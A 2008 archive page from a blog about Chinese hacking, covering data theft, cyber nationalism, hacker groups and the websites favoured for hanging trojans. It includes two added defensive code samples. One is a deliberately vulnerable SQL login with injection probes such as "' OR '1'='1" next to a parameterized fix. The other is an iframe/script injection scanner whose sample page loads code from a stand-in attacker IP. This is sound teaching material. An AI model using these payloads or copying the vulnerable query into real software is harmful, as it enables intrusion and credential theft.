Archive for July, 2008

Jul 30 2008


Published under Uncategorized

I will be attending DEFCON 16 this year.  I’m considering having a Chinese Hacker networking meeting over lunch or dinner.  If you would be interested in attending, please send me an email:  jumper a-t thedarkvisitor d0t com.


Jul 29 2008

Quit moving around…one, two, three: Measuring Malware in China

Hat-Tip: Benny

Oliver Day is guest posting over at and has an interesting article on research into malware infections inside China. He discusses the data and the difficulty in making an accurate analysis of what that information means:

The percent of infections claiming to be from China is not an absolute measure and it is safe to assume that there are not only registrations originating from China claiming to be from other countries but also registrations from outside the country claiming to be Chinese. One of the general assumptions I’ve operated under is that the majority of the infections we see are not operated by those who profit from the infections.

Read more about infected Chinese sites here


Jul 27 2008

Chinese hackers steal 9 million items of personal information from South Koreans

Published under Hacking for money

Coming from the Korea Herald:

Police are investigating the leak of about 9 million items of personal information from the internet, allegedly obtained by a China-based hacker and misused by online Korean moneylenders.

Four private loan brokers in Seoul bought the stolen data for 15 million won ($14,900) from the hacker who allegedly broke into about 2,000 local websites in May 2006 using a computer program called “HDSI 2.0,” the Seoul Metropolitan Police Agency said.

More on the BILLIONS of Won lost here.

Update from Jumper: Here is a screenshot of the HDSI tool:

(Screenshot: HDSI 3.0 Chinese SQL Injection Tool)
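The article names HDSI only as the SQL injection tool used against the 2,000 sites; it says nothing about how the tool works, and this page does not either. As an added example (not from the article, the Korea Herald, or the HDSI tool itself), the Python below shows the class of flaw that point-and-click injection tools automate: a login query built by string concatenation, next to the same query written with driver placeholders. The table and credentials are constructed for the demo, and the in-memory SQLite database stands in for whatever the 2006 sites actually ran.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demo (not from any real site).

    Passwords are stored in clear text only to keep the query logic visible;
    a real system would store a salted hash and compare after the lookup.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", "admin"), ("alice", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Deliberately vulnerable: user input is spliced into the SQL text.

    A quote in the input ends the string literal early, so the rest of the
    input is parsed as SQL syntax. Returns the matched username or None.
    """
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: values travel to the engine separately from the SQL.

    Quotes, comment markers and keywords in the input are only ever compared
    as data, never interpreted as syntax. Same return contract as above.
    """
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic probes: a comment marker that discards the password check, and
# a tautology that makes the WHERE clause true for every row.
COMMENT_BYPASS = ("admin' --", "anything")
TAUTOLOGY_BYPASS = ("nobody", "' OR '1'='1")


def compare(conn: sqlite3.Connection) -> dict:
    """Run both probes through both query styles; returns the outcomes."""
    return {
        "vulnerable_comment": login_vulnerable(conn, *COMMENT_BYPASS),
        "vulnerable_tautology": login_vulnerable(conn, *TAUTOLOGY_BYPASS),
        "parameterized_comment": login_parameterized(conn, *COMMENT_BYPASS),
        "parameterized_tautology": login_parameterized(conn, *TAUTOLOGY_BYPASS),
        "parameterized_real_login": login_parameterized(conn, "admin", "s3cret-admin"),
    }


if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(f"{name:28s} -> {result!r}")
```

The vulnerable function logs the attacker in as `admin` with either probe; the parameterized one returns `None` for both and still accepts the genuine credentials. Escaping quotes by hand is not an alternative to placeholders: the database driver's encoding handles the character set, the column types and the database's own quoting rules, which ad hoc filters routinely get wrong.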


Jul 27 2008

Chinese cyber nationalism revisited

Published under Nationalism

First a question: is there a difference between nationalism and cyber nationalism? The mixture of youth and patriotism has been a defining characteristic of the Red Hacker Alliance and was essential to the group’s formation. What has been running through my head is trying to sort out the differences between ordinary nationalism and cyber nationalism, if there is indeed a difference.

An article from The New Yorker touched on this question during an interview with Tang Jie, the producer of “2008 China Stand Up,” a nationalist short clip that went viral. Tang made the video in response to the negative press China received over its handling of the demonstrations in Tibet. Watching the video, you will see that it was heavily influenced by

The New Yorker article is well worth reading if this subject holds any interest for you. Through the interview, you get the sense that there is a psychological distinction between online cyber nationalism and real life. Perhaps it is just a difference in intensity, with people more vocal online, but I think there is more to it than that.

Fortunately, the article also mentions a book written by Xu Wu titled, Chinese Cyber Nationalism, that I ordered today. So, I’ll get back with you on that after I have a chance to read the book.

UPDATED: Jumper has read the book and left his review in the comments section, but I thought it would be better out here. Let’s just say he does not give a glowing report on the book:

I have read the Xu Wu book already. It is pretty good in that it puts a lot of information in a well-organized format. It really could have used some better editing though. There were grammatical and spelling errors throughout the book that might be distracting for some readers (not me). I think you (Heike) might find that you are already aware of most of the information that Xu Wu talks about. Readers who are less fanatical about researching this subject will find it interesting and insightful but very academic (read: not too entertaining).

Too many facts ruin a good argument, so before we receive information from a guy who might know what he is talking about…

What is the difference between nationalism and cyber nationalism?


Jul 27 2008

Buzul, I know Chinese hackers and you sir, are no Chinese hacker

Published under Hacker Organization

According to, was hacked by Buzul. Sorry, that was all the details available in the article. Can someone tell me if the name Buzul is Turkish?

UPDATE: A very good friend of this blog, Maarten Van Horenbeeck comes up with the answer and more:

Buzul is the Turkish word for a “Glacier”. It’s used by at least one warez group of Turkish origin. Contextually, it’s often used to refer to something which moves slowly but cannot be stopped.

Learning experiences, distribution of illegal contents and potentially hacking all fall under this moniker (there’s actually a Turkish university bearing the name). Middle Eastern hacker groups tend to portray themselves under more dynamic images (“devils”, “waving flags”), but well, Turkey is not entirely Asian.

The hacker most likely active here is Buzul Atay, indeed from Turkey, who sometimes gangs together with Cez0x, named after a pain-killer style drug. Buzul is a member of HayaletTeam, but apparently he has decided to go it alone with his friend here.

As some of you know, we have a famous Chinese hacker named Glacier too. Interesting world.


Jul 25 2008

Podcast Number One

Published under podcast

Dear TDV Readers,


Heike and I invite you to listen to our first podcast. The podcast covers some blog background and the history of Heike’s “The Dark Visitor” project. It is 49 minutes long. The show notes are here. Please enjoy and send comments to podcast [at] thedarkvisitor [dot][com].

With Warm Regards,

Podcast RSS

iTunes download


Jul 25 2008

Chinese hackers assist Trend Micro with virus cleaning tool…forget to inform Trend Micro

Published under Chinese Malware

Well, try to do someone a favor and see how it backfires on you! Sure, a little sticky malware gets attached but is that your fault? Yeah, it really is:

Give a man a phish and he eats for a day, teach a man to phish and he infects the whole bloody interwebs.

More from Trend Micro on Chinese hacker virus cleaning tool


Jul 23 2008

Five favorite targets of Chinese hackers

One thing that has always interested me is the types of targets Chinese hackers seek out for attack. Since it is impossible for us to protect everything, or be everywhere, understanding the most likely targets should be a high priority. Of course this is only part of a comprehensive cyber security program but knowing how your adversary thinks is one area we need to explore.

An article in gave the five most desired websites Chinese hackers sought out in order to hang trojans. Trojans have been the tool of choice for Chinese hackers since their first indigenously produced program Glacier was introduced into the cyber conflict with Taiwan in 1999.

According to, these were the preferred websites:

1. Government websites: Government sites are chosen due to low-level security and the lack of specially trained security personnel. They do not bring financial gain but have the potential to influence public opinion. This type of attack “challenges authority” and brings about personal satisfaction for the hacker. A successful attack on a government website provides the attacker with recognition and fame.

2. Medium and small-scale company websites: Similar to government websites due to the lack of security. While these types of attacks do not bring about fame for the hacker, they are very good practice for the novice.

3. Community websites: Huge number of visitors; even if the trojan is only around for a short period of time, it can result in a large number of infected visitors. Although the value of the individual users is not as great as a financial website, the collective of infected users can be used to create a botnet. Furthermore, this allows the hacker to steal virtual game assets and QQ (ICQ) money.

4. Financial websites: This type of website does not have a large number of users, but the average individual has a high net worth. If a hacker is able to install a trojan here, they can gain user account passwords, access bank accounts and control stock securities. Although this type of website has very high security, it is the most desirable.

5. E-commerce sites: These websites share the benefits of both community and financial websites and are the most lucrative. Hackers are able to manipulate price, supply/demand and control the online transactions. Furthermore, they can use trusted user accounts to construct phishing “activities.” E-commerce websites are the most favored for hackers to carry out phishing exploits.
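“Hanging trojans” on a website, as the article uses the term, is the drive-by pattern in which an attacker who has gained write access to a site appends a hidden iframe or an external script tag to its pages so that every visitor’s browser silently loads an exploit page from a host the attacker controls. The original post describes the targets, not the injected markup; as an added example (not from the post or its source article), the Python below scans a page for the three tell-tale signs a defender or site owner can check for: iframes sized to zero or styled invisible, scripts pulled from a host other than the site’s own, and any markup appended after the closing `</html>` tag. The sample page, the host name `forum.example` and the RFC 5737 documentation address `198.51.100.7` are all constructed for the demo; the heuristics are a practical starting point, not a complete detector.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    """Flags markup typical of a trojan-hanging injection.

    Findings are (kind, detail) tuples; `page_host` is the host the page is
    legitimately served from, used to decide what counts as off-site.
    """

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings: list[tuple[str, str]] = []
        self.seen_html_close = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script" and a.get("src") and self._offsite(a["src"]):
            self.findings.append(("offsite-script", a["src"]))
        if self.seen_html_close:
            # Legitimate templates end at </html>; injected code is usually
            # appended blindly to the end of the file and lands after it.
            self.findings.append(("after-html-close", tag))

    def handle_endtag(self, tag):
        if tag == "html":
            self.seen_html_close = True

    @staticmethod
    def _is_hidden(a: dict) -> bool:
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            return True
        for dim in ("width", "height"):
            raw = (a.get(dim) or "").strip().lower().rstrip("px")
            try:
                if int(raw) <= 1:  # 0x0 and 1x1 frames are invisible
                    return True
            except ValueError:
                continue  # missing or percentage values: not judged here
        return False

    def _offsite(self, src: str) -> bool:
        host = urlparse(src).hostname
        return host is not None and host.lower() != self.page_host


def scan_page(html: str, page_host: str) -> list[tuple[str, str]]:
    """Parse one page and return the list of suspicious findings."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a forum page with a legitimate video embed, plus an
# appended hidden iframe and off-site script of the kind the article describes.
SAMPLE_PAGE = """<html><head><title>Community forum</title>
<script src="/js/site.js"></script></head>
<body><p>Welcome</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>
<iframe src="http://198.51.100.7/ad.htm" width="0" height="0" style="display:none"></iframe>
<script src="http://198.51.100.7/js.js"></script>
"""


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "forum.example"):
        print(f"{kind:18s} {detail}")
```

Run over a site’s saved templates or a crawl of its own pages, this turns up the classic appended payload without any signature for the specific exploit kit behind it. The visible YouTube embed is deliberately left unflagged: it is off-site but not hidden, and a rule that flagged every third-party iframe would drown the real finding in noise. Scripts served from the site’s own CDN host will need that host added to the allow list before the off-site check is useful.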

Army lessons learned: First rule in the Army is never present a problem without a solution. Solution, hire people like Jumper who are experts in preventing these types of attacks.

People often ask me if I am worried about this website getting hacked or shutdown by Chinese hackers…I tell them no, I have an excellent firewall…called Jumper.


Jul 22 2008

Chinese and Iranian hacker connection?

Published under US attacks

Skimming through the news today and came across an article in, on Iranian hacker attempts to disrupt Jewish American leader’s message to Iran. A small blurb in the piece suggested that there was some evidence of Chinese fingerprints or assistance:

In the month since Hoenlein’s message was posted, Rosen said there have been “dozens” of attempts to hack into the site, called He said they succeeded in labeling the Web site as “dangerous” on the Google search engine.

In an e-mail message to The Associated Press, Rosen said his technicians identified the hackers as “probably Iranian based with Chinese assistance or fingerprints.”

I have written to Jerusalemonline for further clarification on this section of the article and hopefully will have an update. It would be very interesting to see if there is more to this, even if the Iranians are just using Chinese hacker malware.


Jul 21 2008

Leader of Chinese female hacker “security” team not happy

On May 29th, we posted a profile of Cn Girl Security Team, an organization of female hackers. A reporter from the Daily News and Analysis, Venkatesan Vembu, picked up the story and called for an interview.

Not sure how widely the story was circulated in the western press but it sure was popular in China.

On her blog, Xiao Tian admits that all of the sudden publicity came as a shock when people started calling to ask about the article. She claims to have stepped away from the “security” site for quite some time and that much of what was written was hype. Just a girl who enjoys blogging and computers. For someone who takes so many pictures of herself, it is hard to believe that this has become such a burden on her.

The Cn Girl Security Team website has been showing a 403 error for the past week and some have suggested it was done by hackers. They say this further demonstrates the low-level technical skills possessed by the group. Xiao Tian denies the rumor and contends there was a problem with the hosting service.

Either way, one more hacker website bites the dust. Hundreds remain but we got you covered.

